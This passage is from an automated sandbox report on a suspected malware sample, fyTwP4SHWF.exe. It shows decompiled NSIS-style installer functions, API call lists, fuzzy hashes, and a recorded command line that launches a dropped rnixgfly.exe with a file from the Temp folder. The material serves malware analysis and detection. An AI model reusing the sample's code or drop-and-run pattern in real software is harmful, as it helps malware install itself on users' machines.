                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                      • GlobalFree.KERNEL32 ref: 00406416
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 0040615C
                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                      • String ID: %ls=%ls$[Rename]$mB$uB$uB
                      • API String ID: 2171350718-2295842750
                      • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                      • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                      • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                      • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                      				struct tagLOGBRUSH _v16;
                      				struct tagRECT _v32;
                      				struct tagPAINTSTRUCT _v96;
                      				struct HDC__* _t70;
                      				struct HBRUSH__* _t87;
                      				struct HFONT__* _t94;
                      				long _t102;
                      				signed int _t126;
                      				struct HDC__* _t128;
                      				intOrPtr _t130;
                      
                      				if(_a8 == 0xf) {
                      					_t130 =  *0x42a270;
                      					_t70 = BeginPaint(_a4,  &_v96);
                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                      					_a8 = _t70;
                      					GetClientRect(_a4,  &_v32);
                      					_t126 = _v32.bottom;
                      					_v32.bottom = _v32.bottom & 0x00000000;
                      					while(_v32.top < _t126) {
                      						_a12 = _t126 - _v32.top;
                      						asm("cdq");
                      						asm("cdq");
                      						asm("cdq");
                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                      						_t87 = CreateBrushIndirect( &_v16);
                      						_v32.bottom = _v32.bottom + 4;
                      						_a16 = _t87;
                      						FillRect(_a8,  &_v32, _t87);
                      						DeleteObject(_a16);
                      						_v32.top = _v32.top + 4;
                      					}
                      					if( *(_t130 + 0x58) != 0xffffffff) {
                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                      						_a16 = _t94;
                      						if(_t94 != 0) {
                      							_t128 = _a8;
                      							_v32.left = 0x10;
                      							_v32.top = 8;
                      							SetBkMode(_t128, 1);
                      							SetTextColor(_t128,  *(_t130 + 0x58));
                      							_a8 = SelectObject(_t128, _a16);
                      							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                      							SelectObject(_t128, _a8);
                      							DeleteObject(_a16);
                      						}
                      					}
                      					EndPaint(_a4,  &_v96);
                      					return 0;
                      				}
                      				_t102 = _a16;
                      				if(_a8 == 0x46) {
                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                      				}
                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                      			}













                      0x0040100a
                      0x00401039
                      0x00401047
                      0x0040104d
                      0x00401051
                      0x0040105b
                      0x00401061
                      0x00401064
                      0x004010f3
                      0x00401089
                      0x0040108c
                      0x004010a6
                      0x004010bd
                      0x004010cc
                      0x004010cf
                      0x004010d5
                      0x004010d9
                      0x004010e4
                      0x004010ed
                      0x004010ef
                      0x004010ef
                      0x00401100
                      0x00401105
                      0x0040110d
                      0x00401110
                      0x00401112
                      0x00401118
                      0x0040111f
                      0x00401126
                      0x00401130
                      0x00401142
                      0x00401156
                      0x00401160
                      0x00401165
                      0x00401165
                      0x00401110
                      0x0040116e
                      0x00000000
                      0x00401178
                      0x00401010
                      0x00401013
                      0x00401015
                      0x0040101f
                      0x0040101f
                      0x00000000

                      APIs
                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                      • BeginPaint.USER32(?,?), ref: 00401047
                      • GetClientRect.USER32 ref: 0040105B
                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                      • FillRect.USER32 ref: 004010E4
                      • DeleteObject.GDI32(?), ref: 004010ED
                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                      • SelectObject.GDI32(00000000,?), ref: 00401140
                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                      • DeleteObject.GDI32(?), ref: 00401165
                      • EndPaint.USER32(?,?), ref: 0040116E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                      • String ID: F
                      • API String ID: 941294808-1304234792
                      • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                      • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                      • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                      • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                      				struct _ITEMIDLIST* _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _t44;
                      				WCHAR* _t45;
                      				signed char _t47;
                      				signed int _t48;
                      				short _t59;
                      				short _t61;
                      				short _t63;
                      				void* _t71;
                      				signed int _t77;
                      				signed int _t78;
                      				short _t81;
                      				short _t82;
                      				signed char _t84;
                      				signed int _t85;
                      				void* _t98;
                      				void* _t104;
                      				intOrPtr* _t105;
                      				void* _t107;
                      				WCHAR* _t108;
                      				void* _t110;
                      
                      				_t107 = __esi;
                      				_t104 = __edi;
                      				_t71 = __ebx;
                      				_t44 = _a8;
                      				if(_t44 < 0) {
                      					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                      				}
                      				_push(_t71);
                      				_push(_t107);
                      				_push(_t104);
                      				_t105 =  *0x42a298 + _t44 * 2;
                      				_t45 = 0x428200;
                      				_t108 = 0x428200;
                      				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                      					_t108 = _a4;
                      					_a4 = _a4 & 0x00000000;
                      				}
                      				_t81 =  *_t105;
                      				_a8 = _t81;
                      				if(_t81 == 0) {
                      					L43:
                      					 *_t108 =  *_t108 & 0x00000000;
                      					if(_a4 == 0) {
                      						return _t45;
                      					}
                      					return E00406668(_a4, _t45);
                      				} else {
                      					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                      						_t98 = 2;
                      						_t105 = _t105 + _t98;
                      						if(_t81 >= 4) {
                      							if(__eflags != 0) {
                      								 *_t108 = _t81;
                      								_t108 = _t108 + _t98;
                      								__eflags = _t108;
                      							} else {
                      								 *_t108 =  *_t105;
                      								_t108 = _t108 + _t98;
                      								_t105 = _t105 + _t98;
                      							}
                      							L42:
                      							_t82 =  *_t105;
                      							_a8 = _t82;
                      							if(_t82 != 0) {
                      								_t81 = _a8;
                      								continue;
                      							}
                      							goto L43;
                      						}
                      						_t84 =  *((intOrPtr*)(_t105 + 1));
                      						_t47 =  *_t105;
                      						_t48 = _t47 & 0x000000ff;
                      						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                      						_t85 = _t84 & 0x000000ff;
                      						_v28 = _t48 | 0x00008000;
                      						_t77 = 2;
                      						_v16 = _t85;
                      						_t105 = _t105 + _t77;
                      						_v24 = _t48;
                      						_v20 = _t85 | 0x00008000;
                      						if(_a8 != _t77) {
                      							__eflags = _a8 - 3;
                      							if(_a8 != 3) {
                      								__eflags = _a8 - 1;
                      								if(__eflags == 0) {
                      									__eflags = (_t48 | 0xffffffff) - _v12;
                      									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                      								}
                      								L38:
                      								_t108 =  &(_t108[lstrlenW(_t108)]);
                      								_t45 = 0x428200;
                      								goto L42;
                      							}
                      							_t78 = _v12;
                      							__eflags = _t78 - 0x1d;
                      							if(_t78 != 0x1d) {
                      								__eflags = (_t78 << 0xb) + 0x42b000;
                      								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                      							} else {
                      								E004065AF(_t108,  *0x42a268);
                      							}
                      							__eflags = _t78 + 0xffffffeb - 7;
                      							if(__eflags < 0) {
                      								L29:
                      								E004068EF(_t108);
                      							}
                      							goto L38;
                      						}
                      						if( *0x42a2e4 != 0) {
                      							_t77 = 4;
                      						}
                      						_t121 = _t48;
                      						if(_t48 >= 0) {
                      							__eflags = _t48 - 0x25;
                      							if(_t48 != 0x25) {
                      								__eflags = _t48 - 0x24;
                      								if(_t48 == 0x24) {
                      									GetWindowsDirectoryW(_t108, 0x400);
                      									_t77 = 0;
                      								}
                      								while(1) {
                      									__eflags = _t77;
                      									if(_t77 == 0) {
                      										goto L26;
                      									}
                      									_t59 =  *0x42a264;
                      									_t77 = _t77 - 1;
                      									__eflags = _t59;
                      									if(_t59 == 0) {
                      										L22:
                      										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                      										__eflags = _t61;
                      										if(_t61 != 0) {
                      											L24:
                      											 *_t108 =  *_t108 & 0x00000000;
                      											__eflags =  *_t108;
                      											continue;
                      										}
                      										__imp__SHGetPathFromIDListW(_v8, _t108);
                      										_a8 = _t61;
                      										__imp__CoTaskMemFree(_v8);
                      										__eflags = _a8;
                      										if(_a8 != 0) {
                      											goto L26;
                      										}
                      										goto L24;
                      									}
                      									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                      									__eflags = _t63;
                      									if(_t63 == 0) {
                      										goto L26;
                      									}
                      									goto L22;
                      								}
                      								goto L26;
                      							}
                      							GetSystemDirectoryW(_t108, 0x400);
                      							goto L26;
                      						} else {
                      							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                      							if( *_t108 != 0) {
                      								L27:
                      								if(_v16 == 0x1a) {
                      									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                      								}
                      								goto L29;
                      							}
                      							E004066A5(_t77, _t105, _t108, _t108, _v16);
                      							L26:
                      							if( *_t108 == 0) {
                      								goto L29;
                      							}
                      							goto L27;
                      						}
                      					}
                      					goto L43;
                      				}
                      			}





























                      0x004066a5
                      0x004066a5
                      0x004066a5
                      0x004066ab
                      0x004066b0
                      0x004066c1
                      0x004066c1
                      0x004066c9
                      0x004066ca
                      0x004066cb
                      0x004066cc
                      0x004066cf
                      0x004066d7
                      0x004066d9
                      0x004066ea
                      0x004066ed
                      0x004066ed
                      0x004066f1
                      0x004066f7
                      0x004066fa
                      0x004068d5
                      0x004068d5
                      0x004068e0
                      0x004068ec
                      0x004068ec
                      0x00000000
                      0x00406700
                      0x00406705
                      0x0040671a
                      0x0040671b
                      0x00406721
                      0x004068b3
                      0x004068c1
                      0x004068c4
                      0x004068c4
                      0x004068b5
                      0x004068b8
                      0x004068bb
                      0x004068bd
                      0x004068bd
                      0x004068c6
                      0x004068c6
                      0x004068cc
                      0x004068cf
                      0x00406702
                      0x00000000
                      0x00406702
                      0x00000000
                      0x004068cf
                      0x00406727
                      0x0040672a
                      0x00406739
                      0x00406740
                      0x0040674c
                      0x0040674f
                      0x00406752
                      0x00406753
                      0x00406758
                      0x0040675e
                      0x00406761
                      0x00406764
                      0x00406857
                      0x0040685c
                      0x0040688f
                      0x00406894
                      0x00406899
                      0x0040689e
                      0x0040689e
                      0x004068a3
                      0x004068a9
                      0x004068ac
                      0x00000000
                      0x004068ac
                      0x0040685e
                      0x00406861
                      0x00406864
                      0x00406879
                      0x00406880
                      0x00406866
                      0x0040686d
                      0x0040686d
                      0x00406888
                      0x0040688b
                      0x0040684f
                      0x00406850
                      0x00406850
                      0x00000000
                      0x0040688b
                      0x00406771
                      0x00406775
                      0x00406775
                      0x00406776
                      0x00406778
                      0x004067b5
                      0x004067b8
                      0x004067c8
                      0x004067cb
                      0x004067d3
                      0x004067d9
                      0x004067d9
                      0x00406834
                      0x00406834
                      0x00406836
                      0x00000000
                      0x00000000
                      0x004067dd
                      0x004067e2
                      0x004067e3
                      0x004067e5
                      0x004067fc
                      0x0040680a
                      0x00406810
                      0x00406812
                      0x00406830
                      0x00406830
                      0x00406830
                      0x00000000
                      0x00406830
                      0x00406818
                      0x00406821
                      0x00406824
                      0x0040682a
                      0x0040682e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040682e
                      0x004067f6
                      0x004067f8
                      0x004067fa
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004067fa
                      0x00000000
                      0x00406834
                      0x004067c0
                      0x00000000
                      0x0040677a
                      0x00406798
                      0x004067a1
                      0x0040683e
                      0x00406842
                      0x0040684a
                      0x0040684a
                      0x00000000
                      0x00406842
                      0x004067ab
                      0x00406838
                      0x0040683c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040683c
                      0x00406778
                      0x00000000
                      0x00406705

                      APIs
                      • GetSystemDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000400), ref: 004067C0
                      • GetWindowsDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                      • lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                      • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Directory$SystemWindowslstrcatlstrlen
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                      • API String ID: 4260037668-4013921938
                      • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                      • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                      • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                      • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004056CA(signed int _a4, WCHAR* _a8) {
                      				struct HWND__* _v8;
                      				signed int _v12;
                      				WCHAR* _v32;
                      				long _v44;
                      				int _v48;
                      				void* _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				WCHAR* _t27;
                      				signed int _t28;
                      				long _t29;
                      				signed int _t37;
                      				signed int _t38;
                      
                      				_t27 =  *0x429244;
                      				_v8 = _t27;
                      				if(_t27 != 0) {
                      					_t37 =  *0x42a314;
                      					_v12 = _t37;
                      					_t38 = _t37 & 0x00000001;
                      					if(_t38 == 0) {
                      						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                      					}
                      					_t27 = lstrlenW(0x422728);
                      					_a4 = _t27;
                      					if(_a8 == 0) {
                      						L6:
                      						if((_v12 & 0x00000004) == 0) {
                      							_t27 = SetWindowTextW( *0x429228, 0x422728);
                      						}
                      						if((_v12 & 0x00000002) == 0) {
                      							_v32 = 0x422728;
                      							_v52 = 1;
                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                      							_v44 = 0;
                      							_v48 = _t29 - _t38;
                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                      						}
                      						if(_t38 != 0) {
                      							_t28 = _a4;
                      							0x422728[_t28] = 0;
                      							return _t28;
                      						}
                      					} else {
                      						_t27 = lstrlenW(_a8) + _a4;
                      						if(_t27 < 0x1000) {
                      							_t27 = lstrcatW(0x422728, _a8);
                      							goto L6;
                      						}
                      					}
                      				}
                      				return _t27;
                      			}

















                      0x004056d0
                      0x004056da
                      0x004056df
                      0x004056e5
                      0x004056f0
                      0x004056f3
                      0x004056f6
                      0x004056fc
                      0x004056fc
                      0x00405702
                      0x0040570a
                      0x0040570d
                      0x0040572a
                      0x0040572e
                      0x00405737
                      0x00405737
                      0x00405741
                      0x0040574a
                      0x00405756
                      0x0040575d
                      0x00405761
                      0x00405764
                      0x00405777
                      0x00405785
                      0x00405785
                      0x00405789
                      0x0040578b
                      0x0040578e
                      0x00000000
                      0x0040578e
                      0x0040570f
                      0x00405717
                      0x0040571f
                      0x00405725
                      0x00000000
                      0x00405725
                      0x0040571f
                      0x0040570d
                      0x0040579a

                      APIs
                      • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                      • String ID: ('B
                      • API String ID: 1495540970-2332581011
                      • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                      • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                      • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                      • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                      				struct tagLOGBRUSH _v16;
                      				long _t39;
                      				long _t41;
                      				void* _t44;
                      				signed char _t50;
                      				long* _t54;
                      
                      				if(_a4 + 0xfffffecd > 5) {
                      					L18:
                      					return 0;
                      				}
                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                      					goto L18;
                      				} else {
                      					_t50 = _t54[5];
                      					if((_t50 & 0xffffffe0) != 0) {
                      						goto L18;
                      					}
                      					_t39 =  *_t54;
                      					if((_t50 & 0x00000002) != 0) {
                      						_t39 = GetSysColor(_t39);
                      					}
                      					if((_t54[5] & 0x00000001) != 0) {
                      						SetTextColor(_a8, _t39);
                      					}
                      					SetBkMode(_a8, _t54[4]);
                      					_t41 = _t54[1];
                      					_v16.lbColor = _t41;
                      					if((_t54[5] & 0x00000008) != 0) {
                      						_t41 = GetSysColor(_t41);
                      						_v16.lbColor = _t41;
                      					}
                      					if((_t54[5] & 0x00000004) != 0) {
                      						SetBkColor(_a8, _t41);
                      					}
                      					if((_t54[5] & 0x00000010) != 0) {
                      						_v16.lbStyle = _t54[2];
                      						_t44 = _t54[3];
                      						if(_t44 != 0) {
                      							DeleteObject(_t44);
                      						}
                      						_t54[3] = CreateBrushIndirect( &_v16);
                      					}
                      					return _t54[3];
                      				}
                      			}









                      0x0040463d
                      0x004046f3
                      0x00000000
                      0x004046f3
                      0x0040464e
                      0x00404652
                      0x00000000
                      0x0040466c
                      0x0040466c
                      0x00404675
                      0x00000000
                      0x00000000
                      0x00404677
                      0x00404683
                      0x00404686
                      0x00404686
                      0x0040468c
                      0x00404692
                      0x00404692
                      0x0040469e
                      0x004046a4
                      0x004046ab
                      0x004046ae
                      0x004046b1
                      0x004046b3
                      0x004046b3
                      0x004046bb
                      0x004046c1
                      0x004046c1
                      0x004046cb
                      0x004046d0
                      0x004046d3
                      0x004046d8
                      0x004046db
                      0x004046db
                      0x004046eb
                      0x004046eb
                      0x00000000
                      0x004046ee

                      APIs
                      • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                      • GetSysColor.USER32(00000000), ref: 00404686
                      • SetTextColor.GDI32(?,00000000), ref: 00404692
                      • SetBkMode.GDI32(?,?), ref: 0040469E
                      • GetSysColor.USER32(?), ref: 004046B1
                      • SetBkColor.GDI32(?,?), ref: 004046C1
                      • DeleteObject.GDI32(?), ref: 004046DB
                      • CreateBrushIndirect.GDI32(?), ref: 004046E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                      • String ID:
                      • API String ID: 2320649405-0
                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                      • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                      • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                      				intOrPtr _t65;
                      				intOrPtr _t66;
                      				intOrPtr _t72;
                      				void* _t76;
                      				void* _t79;
                      
                      				_t72 = __edx;
                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                      				_t65 = 2;
                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                      				_t66 = E00402D84(_t65);
                      				_t79 = _t66 - 1;
                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                      				if(_t79 < 0) {
                      					L36:
                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                      				} else {
                      					__ecx = 0x3ff;
                      					if(__eax > 0x3ff) {
                      						 *(__ebp - 0x44) = 0x3ff;
